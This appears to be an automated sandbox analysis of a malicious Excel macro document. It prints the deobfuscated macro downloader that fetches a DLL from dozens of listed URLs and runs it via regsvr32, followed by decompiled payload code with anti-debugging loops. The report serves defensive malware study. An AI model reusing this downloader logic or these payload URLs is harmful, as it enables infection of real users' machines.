Replace	Replace("SET.NAME("b0b",CHAR(101))","?","https://app.wind.net.ar/dh4pqngz.zip") -> SET.NAME("b0b",CHAR(101)) Replace("SET.NAME("v0","n")","?","http://mnt.unq.gtranzit.com/nljcgq.rar") -> SET.NAME("v0","n") Replace("SET.NAME("i0","J")","?","http://conetica.com.mx/nsoo0p0.zip") -> SET.NAME("i0","J") Replace("CANCEL.KEY(TRUE)","?","https://view.marketfresh.com.ph/fy7k3m.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("w00","\")","?","https://smshost.pk/n6t4z3wob.rar") -> SET.NAME("w00","\") Replace("IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE))","?","http://mroadlines.gtranzit.com/h594ts.rar") -> IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE)) Replace("SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00)","?","https://mindmap.monster/fzqdqni9.zip") -> SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00) Replace("SET.NAME("o0","32")","?","https://mindmap.monster/fzqdqni9.zip") -> SET.NAME("o0","32") Replace("CANCEL.KEY(TRUE)","?","http://tsongpu.com/sbvrrsit.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("oo0","?")","?","https://media-server.skyinternet.com.pk/hhsz1e0.rar") -> SET.NAME("oo0","https://media-server.skyinternet.com.pk/hhsz1e0.rar") Replace("SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll")","?","http://www.range.com.sa/sbpbb3bh8.zip") -> SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll") Replace("SET.NAME("w00",b0b)","?","http://luisjj.dscproskahuer.mx/qn6obwe.zip") -> SET.NAME("w00",b0b) Replace("SET.NAME("ba",".")","?","http://dating.khokhas.co.za/judpotp.rar") -> SET.NAME("ba",".") Replace("CANCEL.KEY(TRUE)","?","http://shafiexports.com.pk/c8n1nbw55.zip") -> CANCEL.KEY(TRUE) Replace("SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00)","?","http://static.peronti.com.br/l9btnm.rar") -> SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00) Replace("SET.NAME("v0","O")","?","http://investigatorsnorthwest.co.uk/n37b33.rar") -> SET.NAME("v0","O") Replace("SET.NAME("wegb","URLM"&v0&"N")","?","http://maxtox.com.pk/snpoipa5i.zip") -> SET.NAME("wegb","URLM"&v0&"N") Replace("CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)","?","https://app.wind.net.ar/dh4pqngz.zip") -> CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0) Replace("SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00)","?","http://mnt.unq.gtranzit.com/nljcgq.rar") -> SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00) Replace("SET.NAME("wegb","Sh"&w00&"ll")","?","https://view.marketfresh.com.ph/fy7k3m.rar") -> SET.NAME("wegb","Sh"&w00&"ll") Replace("CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0," -s "&bb&ab&ba,0,0)","?","http://static.peronti.com.br/l9btnm.rar") -> CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0," -s "&bb&ab&ba,0,0) Replace("SET.NAME("b0b",CHAR(101))","?","https://grand-detective.com/aa8tb1c.zip") -> SET.NAME("b0b",CHAR(101)) Replace("SET.NAME("v0","n")","?","http://shafiexports.com.pk/c8n1nbw55.zip") -> SET.NAME("v0","n") Replace("SET.NAME("i0","J")","?","https://dxres.info/qkh2oe.rar") -> SET.NAME("i0","J") Replace("CANCEL.KEY(TRUE)","?","https://dw2.co.id/jy5e3w.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("w00","\")","?","http://speech2text.ai/kpek5jmxx.rar") -> SET.NAME("w00","\") Replace("IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE))","?","http://xandarsa.com/neidyjzyu.rar") -> IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE)) Replace("SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00)","?","https://www.mac-movil.com/jz2dnjk.rar") -> SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00) Replace("SET.NAME("o0","32")","?","http://mycarechoice.com.au/tmytdaq.rar") -> SET.NAME("o0","32") Replace("SET.NAME("oo0","?")","?","https://rostra-holding.ru/j13upva.zip") -> SET.NAME("oo0","https://rostra-holding.ru/j13upva.zip") Replace("SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll")","?","https://dw2.co.id/jy5e3w.rar") -> SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll") Replace("SET.NAME("w00",b0b)","?","https://media-server.skyinternet.com.pk/hhsz1e0.rar") -> SET.NAME("w00",b0b) Replace("SET.NAME("ba",".")","?","http://speech2text.ai/kpek5jmxx.rar") -> SET.NAME("ba",".") Replace("CANCEL.KEY(TRUE)","?","http://mroadlines.gtranzit.com/h594ts.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00)","?","https://dxres.info/qkh2oe.rar") -> SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00) Replace("SET.NAME("v0","O")","?","https://magnifiedhealth.co.za/yopn90fnk.rar") -> SET.NAME("v0","O") Replace("SET.NAME("wegb","URLM"&v0&"N")","?","https://mindmap.monster/fzqdqni9.zip") -> SET.NAME("wegb","URLM"&v0&"N") Replace("CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)","?","http://conetica.com.mx/nsoo0p0.zip") -> CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)
Part of subcall function ecimovert@Module1: Int
Part of subcall function ecimovert@Module1: UBound
Part of subcall function ecimovert@Module1: Rnd
Split
MsgBox
Run	Run("moreP_ab") Run("moreP_ab")

Strings	Decrypted Strings
"!"
""""
"="
"?"
"="
"?"
""""

Line	Instruction	Meta Information
7	Function pagesREviewsd(optional wq as Integer) as Integer
8	Dim O as Integer	executed
8	Dim Oa as Integer
8	ol = 1
9	Sheets(ol).Cells(homepodd, ol).Name = bycilke & "ab"	Cells
10	Dim MiV(43901)
11	For Each sem in ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)	SpecialCells xlCellTypeConstants
12	MiV(sem.value) = Chr(sem.Row)	value Chr Row
13	Next	SpecialCells xlCellTypeConstants
14	For Each nog in MiV
15	govs = govs + nog
16	Next
17	Oa = 9
17	kij = Split(govs, "!")	Split
17	Ada = Split(kij(ol), yellowsto(homepodd))	Split
18	For Each Vo in Ada
19	Sheets(ol).Cells(homepodd, ol).value = "=" & Replace(Vo, "?", ecimovert(Split(kij(0), yellowsto(Oa))))	Cells Replace("SET.NAME("b0b",CHAR(101))","?","https://app.wind.net.ar/dh4pqngz.zip") -> SET.NAME("b0b",CHAR(101)) Split executed
20	On Error Resume Next
21	MsgBox (Run("" & bycilke & "ab"))	MsgBox Run("moreP_ab") executed
22	Next
22	Oa = 2
23	End Function

Function yellowsto, APIs: 0, Strings: 3, Number of lines: 6, Relevance: 3.756

Strings	Decrypted Strings
"$"
"]"
"]"

Line	Instruction	Meta Information
32	Function yellowsto(yel as Integer)
33	yellowsto = "$"	executed
34	If yel = 2 Then
34	yellowsto = "]"
34	Endif
35	End Function

Function ecimovert, APIs: 3, Strings: 0, Number of lines: 5, Relevance: 3.755

APIs	Meta Information
Int
UBound
Rnd

Line	Instruction	Meta Information
27	Function ecimovert(nimo as Variant) as String
27	Randomize:	executed
28	df = 2 - 1
28	ecimovert = nimo(Int((UBound(nimo) + df) * Rnd))	Int UBound Rnd
29	End Function

Function bycilke, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings	Decrypted Strings
"moreP_"

Line	Instruction	Meta Information
24	Function bycilke()
25	bycilke = "moreP_"	executed
26	End Function

Function homepodd, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
3	Function homepodd()
4	homepodd = 5 - 3	executed
5	End Function

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "view_1_a, 1, 0, MSForms, MultiPage"

Executed Functions

Subroutine view_1_a_Layout, APIs: 2, Strings: 0, Number of lines: 4, Relevance: 4.504

APIs	Meta Information
Part of subcall function ResizePagess1@Sheet1: OnTime
Part of subcall function ResizePagess1@Sheet1: Now

Line	Instruction	Meta Information
13	Private Sub view_1_a_Layout(ByVal Index as Long)
14	ol = 765	executed
14	ResizePagess1
15	End Sub

Subroutine ResizePagess1, APIs: 2, Strings: 1, Number of lines: 3, Relevance: 4.503

APIs	Meta Information
OnTime
Now

Strings	Decrypted Strings
"pages""REviewsd"

Line	Instruction	Meta Information
10	Sub ResizePagess1()
11	Application.OnTime Now, "pages" & "REviewsd"	OnTime Now executed
12	End Sub

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: regsvr32.exe PID: 2540 Parent PID: 2548 regsvr32.exeCOMMON

Executed Functions

Function 0025B780, Relevance: 65.0, APIs: 3, Strings: 34, Instructions: 297memorynativeCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0025B7D1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0025B8D3
NtSetInformationProcess.NTDLL(000000FF,00000022,00000002,00000004), ref: 0025BB1D

Strings

o, xrefs: 0025BA9D
e, xrefs: 0025BAA5
c, xrefs: 0025BA65
S, xrefs: 0025BA89
i, xrefs: 0025BAB9
l, xrefs: 0025BA7D
e, xrefs: 0025BAD5
d, xrefs: 0025BA79
o, xrefs: 0025BA69
., xrefs: 0025BA75
t, xrefs: 0025BA91
r, xrefs: 0025BAC9
s, xrefs: 0025BAAD
h, xrefs: 0025BA61
a, xrefs: 0025BAC5
s, xrefs: 0025BA5D
l, xrefs: 0025BA81
P, xrefs: 0025BA95
e, xrefs: 0025BACD
s, xrefs: 0025BAD9
c, xrefs: 0025BAA1
r, xrefs: 0025BA6D
ntdll.dll, xrefs: 0025BAE5, 0025BAE8
NtSetInformationProcess, xrefs: 0025BAF7, 0025BAFA
n, xrefs: 0025BAD1
p, xrefs: 0025BAB5
r, xrefs: 0025BA99
s, xrefs: 0025BAA9
e, xrefs: 0025BA8D
A, xrefs: 0025BABD
w, xrefs: 0025BAC1
s, xrefs: 0025BADD
D, xrefs: 0025BAB1
e, xrefs: 0025BA71

Memory Dump Source

Source File: 00000004.00000002.2392508044.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: AllocVirtual$InformationProcess
String ID: .$A$D$NtSetInformationProcess$P$S$a$c$c$d$e$e$e$e$e$h$i$l$l$n$ntdll.dll$o$o$p$r$r$r$s$s$s$s$s$t$w
API String ID: 909339949-3052210031
Opcode ID: 97769fb1da223d042207744e2717f0fc49578be2e3c1aaca9d71a9948057ec57
Instruction ID: f91aa449abb17499cff8b392c35785ed50ea649b4ec079b16657f10a2bb2a1dc
Opcode Fuzzy Hash: 97769fb1da223d042207744e2717f0fc49578be2e3c1aaca9d71a9948057ec57
Instruction Fuzzy Hash: 4EE12174D04289DFDB05CF98C444BDEBBB2BF59304F148198E9486F382C3BAA955CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0025BA14, Relevance: 61.3, APIs: 1, Strings: 34, Instructions: 79nativeCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL(000000FF,00000022,00000002,00000004), ref: 0025BB1D

Strings

o, xrefs: 0025BA9D
e, xrefs: 0025BAA5
c, xrefs: 0025BA65
S, xrefs: 0025BA89
i, xrefs: 0025BAB9
l, xrefs: 0025BA7D
e, xrefs: 0025BAD5
d, xrefs: 0025BA79
o, xrefs: 0025BA69
., xrefs: 0025BA75
t, xrefs: 0025BA91
r, xrefs: 0025BAC9
s, xrefs: 0025BAAD
h, xrefs: 0025BA61
a, xrefs: 0025BAC5
s, xrefs: 0025BA5D
l, xrefs: 0025BA81
P, xrefs: 0025BA95
e, xrefs: 0025BACD
s, xrefs: 0025BAD9
c, xrefs: 0025BAA1
r, xrefs: 0025BA6D
ntdll.dll, xrefs: 0025BAE5, 0025BAE8
NtSetInformationProcess, xrefs: 0025BAF7, 0025BAFA
n, xrefs: 0025BAD1
p, xrefs: 0025BAB5
r, xrefs: 0025BA99
s, xrefs: 0025BAA9
e, xrefs: 0025BA8D
A, xrefs: 0025BABD
w, xrefs: 0025BAC1
s, xrefs: 0025BADD
D, xrefs: 0025BAB1
e, xrefs: 0025BA71

Memory Dump Source

Source File: 00000004.00000002.2392508044.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: InformationProcess
String ID: .$A$D$NtSetInformationProcess$P$S$a$c$c$d$e$e$e$e$e$h$i$l$l$n$ntdll.dll$o$o$p$r$r$r$s$s$s$s$s$t$w
API String ID: 1801817001-3052210031
Opcode ID: 7a93e4dca30af2595c83838b26e0c91876fe79106ecb4432ae3e537336c9e689
Instruction ID: 2d627bdce97dd843af759e82c187dfcaa2b368869949c59114ea3d812eebadf6
Opcode Fuzzy Hash: 7a93e4dca30af2595c83838b26e0c91876fe79106ecb4432ae3e537336c9e689
Instruction Fuzzy Hash: 3B416B20D0C3C8D9EB12C6E8D4587DDBFB25B22748F18419895882F296C7FF1669C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 003A5150, Relevance: 30.6, APIs: 14, Strings: 3, Instructions: 826
sleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E003A5150() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t173;
				signed int _t175;
				signed int _t184;
				signed int _t186;
				signed int _t192;
				signed int _t194;
				void* _t197;
				signed int _t205;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr* _t238;
				void* _t253;
				void* _t263;
				intOrPtr _t266;
				signed int _t276;
				signed int _t280;
				void* _t295;
				intOrPtr* _t296;
				signed int _t299;
				unsigned int _t303;
				intOrPtr _t306;
				signed short* _t307;
				signed int _t310;
				signed int _t327;
				signed int _t328;
				signed int _t333;
				char* _t341;
				char _t343;
				signed int _t354;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				signed int _t374;
				void* _t379;
				signed int _t380;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t430;
				intOrPtr* _t438;
				signed int _t453;
				signed int _t455;
				signed int _t458;
				signed int _t490;
				signed int _t492;
				signed int _t504;
				signed int _t505;
				signed int _t525;
				signed int _t534;
				void* _t539;
				signed int _t540;
				signed int _t548;
				intOrPtr* _t549;
				void* _t552;
				intOrPtr _t555;
				intOrPtr _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				intOrPtr* _t562;

				_push(_t537);
				_push(_t533);
				_t562 = _t561 - 0x204;
				_push(1);
				E003B7980(_t562 + 0x12c);
				_t173 = E003B15C0(0xa1310f65, 0x755128fe);
				if(_t173 == 0) {
					 *0x3db1b5 = 0;
					 *0x3db1ad = 0;
					 *0x3db1b1 = 0;
					 *0x3db1b9 = 0;
					 *0x3db1bd = 0;
					__eflags =  *0x3db026 & 0x000000ff;
					if(( *0x3db026 & 0x000000ff) != 0) {
						E003C5CB0(_t562 + 0xdc, 3, 0x28, 0x64);
						_t382 = 0;
						__eflags = 0;
						_t557 = _t562 + 0x1e4;
						while(1) {
							L4:
							E003C5CB0(_t557, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1e4));
							Sleep(0xa);
							E003C0B10(_t557);
							_t382 = _t382 + 1;
							__eflags = _t382 - 0xbebbe7c;
							if(_t382 >= 0xbebbe7c) {
								break;
							} else {
								goto L5;
							}
							while(1) {
								L5:
								__eflags = _t382 - 0x137b;
								if(_t382 < 0x137b) {
									goto L4;
								}
								_t382 = _t382 + 1;
								__eflags = _t382 - 0xbebbe7c;
								if(_t382 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L8;
							}
						}
						L8:
						_t383 = 0;
						__eflags = 0;
						_t558 = _t562 + 0x1ec;
						while(1) {
							L9:
							E003C5CB0(_t558, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1ec));
							Sleep(0xa);
							E003C0B10(_t558);
							_t383 = _t383 + 1;
							__eflags = _t383 - 0xbebbe7c;
							if(_t383 >= 0xbebbe7c) {
								break;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								__eflags = _t383 - 0x137b;
								if(_t383 < 0x137b) {
									goto L9;
								}
								_t383 = _t383 + 1;
								__eflags = _t383 - 0xbebbe7c;
								if(_t383 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L13;
							}
						}
						L13:
						_t384 = 0;
						__eflags = 0;
						_t559 = _t562 + 0x1f4;
						while(1) {
							L14:
							E003C5CB0(_t559, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1f4));
							Sleep(0xa);
							E003C0B10(_t559);
							_t384 = _t384 + 1;
							__eflags = _t384 - 0xbebbe7c;
							if(_t384 >= 0xbebbe7c) {
								break;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								__eflags = _t384 - 0x137b;
								if(_t384 < 0x137b) {
									goto L14;
								}
								_t384 = _t384 + 1;
								__eflags = _t384 - 0xbebbe7c;
								if(_t384 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L18;
							}
						}
						L18:
						_t385 = 0;
						__eflags = 0;
						_t560 = _t562 + 0x1fc;
						while(1) {
							L19:
							E003C5CB0(_t560, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1fc));
							Sleep(0xa);
							E003C0B10(_t560);
							_t385 = _t385 + 1;
							__eflags = _t385 - 0xbebbe7c;
							if(_t385 >= 0xbebbe7c) {
								break;
							} else {
								goto L20;
							}
							while(1) {
								L20:
								__eflags = _t385 - 0x137b;
								if(_t385 < 0x137b) {
									goto L19;
								}
								_t385 = _t385 + 1;
								__eflags = _t385 - 0xbebbe7c;
								if(_t385 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L23;
							}
						}
						L23:
						E003C0B10(_t562 + 0xd4);
					}
					_push(0x755aa3f0);
					_t175 = E003B7560();
					__eflags = _t175;
					if(_t175 != 0) {
						_t341 = E003B15C0(0x588ab3ea, 0x1be15feb);
						__eflags =  *_t341 - 0xe9;
						if( *_t341 == 0xe9) {
							_t150 =  *((intOrPtr*)(_t341 + 1)) + 5; // 0x5
							_t379 = _t341 + _t150;
							_t490 = E003B15C0(0x588ab3ea, 0x3b4caff7);
							__eflags = _t490;
							if(_t490 == 0) {
								L139:
								_t555 =  *0x3d9414; // 0x3f7883
								_t343 =  *0x3d941a; // -16
								 *((intOrPtr*)(_t562 + 0xdc)) = _t555;
								 *((short*)(_t562 + 0xe0)) =  *0x3d9418 & 0x0000ffff;
								 *((char*)(_t562 + 0xe2)) = _t343;
								_t537 =  *(_t562 + 0x6c);
								_t556 =  *((intOrPtr*)(_t562 + 0x78));
								while(1) {
									_push(0x3f);
									_push(7);
									_push(_t562 + 0xe4);
									_t380 = E003B0DA0(_t537, _t556);
									__eflags = _t380;
									if(_t380 == 0) {
										goto L26;
									}
									 *(_t562 + 0xec) = _t380;
									 *((intOrPtr*)(_t562 + 0xf0)) = 0x10;
									_t556 = _t556 -  ~_t537 + _t380 + 7;
									 *((intOrPtr*)(_t562 + 0xf4)) = 0x40;
									_t161 = _t380 + 7; // 0x7
									_t537 = _t161;
									_t492 = E003B15C0(0x588ab3ea, 0x649746ec);
									__eflags = _t492;
									if(_t492 != 0) {
										_t533 = _t562 + 0xf0;
										 *_t492(0xffffffff, _t562 + 0xec, _t562 + 0xf0,  *((intOrPtr*)(_t562 + 0xf8)), _t562 + 0xf4);
									}
									 *((char*)(_t380 + 5)) = 0x90;
									 *((char*)(_t380 + 4)) = 0x90;
									_t525 = E003B15C0(0x588ab3ea, 0x649746ec);
									__eflags = _t525;
									if(_t525 != 0) {
										_t533 = _t562 + 0xec;
										 *_t525(0xffffffff, _t562 + 0xec, _t562 + 0xf0,  *((intOrPtr*)(_t562 + 0xf8)), _t562 + 0xf4);
									}
								}
								goto L26;
							} else {
								_t354 =  *_t490(0xffffffff, _t379, 0, _t562 + 0x6c, 0x1c, 0);
								__eflags = _t354;
								if(_t354 != 0) {
									goto L26;
								} else {
									goto L139;
								}
							}
							goto L145;
						}
					}
					L26:
					E003A1270(_t533, _t537);
					 *((intOrPtr*)(_t562 + 0x12c)) = 0x2800;
					_push(0x2800);
					E003C9350(_t562 + 0xfc);
					_t548 = E003C9640(_t562 + 0xfc, 0);
					_t504 = E003B15C0(0xd93f3271, 0xa1ee59b);
					__eflags = _t504;
					if(_t504 != 0) {
						 *_t504(_t548, _t562 + 0x12c); // executed
					}
					__eflags = _t548;
					if(_t548 != 0) {
						_t537 = 0x4b005452;
						do {
							__eflags =  *((intOrPtr*)(_t548 + 0x194)) - _t537 | ( *(_t548 + 0x198) & 0x0000ffff) - 0x000031a1;
							if(( *((intOrPtr*)(_t548 + 0x194)) - _t537 | ( *(_t548 + 0x198) & 0x0000ffff) - 0x000031a1) == 0) {
								E003A5150();
							}
							_t548 =  *_t548;
							__eflags = _t548;
						} while (_t548 != 0);
					}
					E003C9510(_t562 + 0xf8);
					E003B8810(_t562 + 0x108, 0);
					 *0x3db1c8 = _t562 + 0x108;
					_t184 = E003B15C0(0xa1310f65, 0xe10858ef);
					__eflags = _t184;
					if(_t184 == 0) {
						__eflags = 0;
						_t186 = E003B15C0(0x1b47f147, 0x4c00b324);
						__eflags = _t186;
						if(_t186 == 0) {
							 *0x3db1d0 = 0;
							_t549 = E003B3930(0, 0, _t533, _t537);
							__eflags =  *_t549 - 0x10;
							if( *_t549 < 0x10) {
								E003A5150();
							}
							E003A6020(0);
							E003B8810(_t562 + 0x114, 0x200);
							_t505 = E003B15C0(0xa1310f65, 0xc4d11e8a);
							__eflags = _t505;
							if(_t505 != 0) {
								_t333 =  *(_t562 + 0x114) >> 1;
								__eflags = _t333;
								 *_t505(0,  *(_t562 + 0x114), _t333);
							}
							E003B2580(_t562 + 0x118, _t533, _t537);
							_t192 = E003B9C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0x118)));
							__eflags = _t192;
							if(_t192 == 0) {
								E003B2780(_t562 + 0xe4, _t533, _t537);
								_t194 = E003B9C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0xe4)));
								__eflags = _t194;
								if(_t194 == 0) {
									E003B2580(_t562 + 0xb4, _t533, _t537);
									_t537 = _t562 + 0x98;
									E003BD980(_t562 + 0xbc, _t562 + 0x98, 0x5c);
									_t197 = E003C7600(_t562 + 0x98, 2);
									E003AAC00(_t562 + 0xbc, 6);
									E003B8CC0(_t197,  *((intOrPtr*)(_t562 + 0xbc)));
									E003B8CA0(_t562 + 0xbc);
									E003C89F0(_t537, _t562 + 0x124, 0x5c);
									E003C8910(_t537, _t533, _t537);
									E003B8CA0(_t562 + 0xb4);
									_t205 = E003B9C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0x120)));
									__eflags = _t205;
									_t47 = _t205 > 0;
									__eflags = _t47;
									_t369 = 0 | _t47;
									E003B8CA0(_t562 + 0x120);
								} else {
									_t369 = 1;
								}
								E003B8CA0(_t562 + 0xe4);
								E003B8CA0(_t562 + 0x118);
								__eflags = _t369;
								if(_t369 == 0) {
									_t370 = 0;
									__eflags = 0;
								} else {
									goto L48;
								}
							} else {
								E003B8CA0(_t562 + 0x118);
								L48:
								_t370 = 1;
							}
							E003AAC00(_t562 + 0x120, 2);
							E003BD980(_t562 + 0x128, _t562 + 0x130, 0x7e);
							E003B8CA0(_t562 + 0x120);
							__eflags =  *(_t562 + 0x130);
							if( *(_t562 + 0x130) > 0) {
								 *_t562 = _t549;
								__eflags = 0;
								_t534 = _t562 + 0x130;
								while(1) {
									L52:
									_t327 = E003B15C0(0xa1310f65, 0xf3af54a7);
									__eflags = _t327;
									if(_t327 != 0) {
										LoadLibraryW( *(E003C7600(_t534, _t537))); // executed
									}
									_t328 =  *(_t562 + 0x130);
									while(1) {
										L55:
										_t537 = 1;
										__eflags = 1 - _t328;
										if(1 >= _t328) {
											break;
										}
										__eflags = 1 - 4;
										if(1 != 4) {
											goto L52;
										} else {
											_t508 =  *0x3db02a & 0x000000ff;
											__eflags = ( *0x3db02a & 0x000000ff) - 2;
											if(( *0x3db02a & 0x000000ff) == 2) {
												continue;
											} else {
												while(1) {
													L52:
													_t327 = E003B15C0(0xa1310f65, 0xf3af54a7);
													__eflags = _t327;
													if(_t327 != 0) {
														LoadLibraryW( *(E003C7600(_t534, _t537))); // executed
													}
													_t328 =  *(_t562 + 0x130);
													goto L55;
												}
											}
										}
										goto L60;
									}
									_t549 =  *_t562;
									goto L60;
								}
							}
							L60:
							__eflags =  *((intOrPtr*)(_t549 + 0x2c)) - 2;
							if( *((intOrPtr*)(_t549 + 0x2c)) != 2) {
								__eflags =  *0x3db028 & 0x000000ff;
								if(( *0x3db028 & 0x000000ff) == 0) {
									__eflags =  *0x3db265 & 0x000000ff;
									if(( *0x3db265 & 0x000000ff) == 0) {
										__eflags =  *0x3db1cc - 1;
										if( *0x3db1cc != 1) {
											_t306 =  *0x3db1d0; // 0x4c77c8
											_t62 = _t306 + 4; // 0x4c77da
											_t307 =  *_t62;
											_t508 =  *_t307 & 0x0000ffff;
											__eflags = ( *_t307 & 0x0000ffff) - 0x2d;
											if(( *_t307 & 0x0000ffff) != 0x2d) {
												E003B8AB0(_t562 + 0xcc, _t307, 0);
												_push(0x80);
												_push(0);
												E003CA4E0(_t562 + 0x68, __eflags,  *((intOrPtr*)(_t562 + 0xd0)), 1);
												_t310 = E003CBEA0(_t562 + 0x64, _t508, _t537);
												__eflags = _t310;
												if(_t310 == 0) {
													__eflags =  *((char*)(_t562 + 0x68));
													if( *((char*)(_t562 + 0x68)) != 0) {
														E003CBE30(_t562 + 0x64, _t537);
													}
													E003B8CA0(_t562 + 0x58);
													_t540 = 0;
													__eflags = 0;
													while(1) {
														__eflags = E003CA730(_t562 + 0xc4, _t508);
														if(__eflags == 0) {
															break;
														}
														E003B22A0(0x64, _t508);
														_t540 = _t540 + 1;
														__eflags = _t540 - 0x64;
														if(__eflags < 0) {
															continue;
														}
														break;
													}
													_t537 = _t562 + 0xcc;
													do {
														E003BAE80(_t562 + 0xcc, __eflags, _t537, 0x5c);
														E003B8CC0(_t562 + 0xc8,  *(_t562 + 0xcc));
														E003B8CA0(_t537);
														__eflags = E003CA730(_t562 + 0xc4, _t508);
													} while (__eflags == 0);
												} else {
													__eflags =  *((char*)(_t562 + 0x68));
													if( *((char*)(_t562 + 0x68)) != 0) {
														E003CBE30(_t562 + 0x64, _t537);
													}
													E003B8CA0(_t562 + 0x58);
												}
												E003B8CA0(_t562 + 0xc4);
											}
										}
									}
								}
								__eflags = ( *0x3db02a & 0x000000ff) - 2;
								if(( *0x3db02a & 0x000000ff) == 2) {
									L89:
									_t215 =  *0x3db1ad; // 0x2661f98
									__eflags = _t215;
